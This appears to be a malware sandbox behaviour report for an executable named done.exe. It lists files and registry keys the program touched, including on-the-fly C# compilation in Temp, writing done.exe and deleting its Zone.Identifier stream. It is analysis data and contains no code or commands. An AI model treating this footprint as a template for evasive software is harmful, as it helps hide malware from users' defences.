C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\9D08940x9AaLl1so.CIL\*
C:\Users\Seven01\AppData\Local\Temp\done.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.tmp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.0.cs
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.out
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.err
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\done.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\done.exe
C:\Users\Seven01\done.exe:Zone.Identifier
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_64
C:\Windows\assembly\GAC_64\mscorlib.resources
C:\Windows\assembly\GAC_32
C:\Windows\assembly\GAC_32\mscorlib.resources
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\*
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC
C:\Windows\assembly\GAC\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_64
C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_32
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_MSIL
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP
C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp
C:\Windows\System32\tzres.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\done.exe.config
C:\Users\Seven01\AppData\Local\Temp\done.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP
C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp
C:\Windows\System32\tzres.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.tmp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.0.cs
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.out
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.err
C:\Users\Seven01\done.exe
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP
C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.0.cs
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.pdb
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.dll
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.err
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.tmp
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.cmdline
C:\Users\Seven01\AppData\Local\Temp\xfqgveh4.out
C:\Users\Seven01\done.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RES24E8.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC5CB01F4646E345F29F6436C963741A31.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\done.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\done.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\95DA1246
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
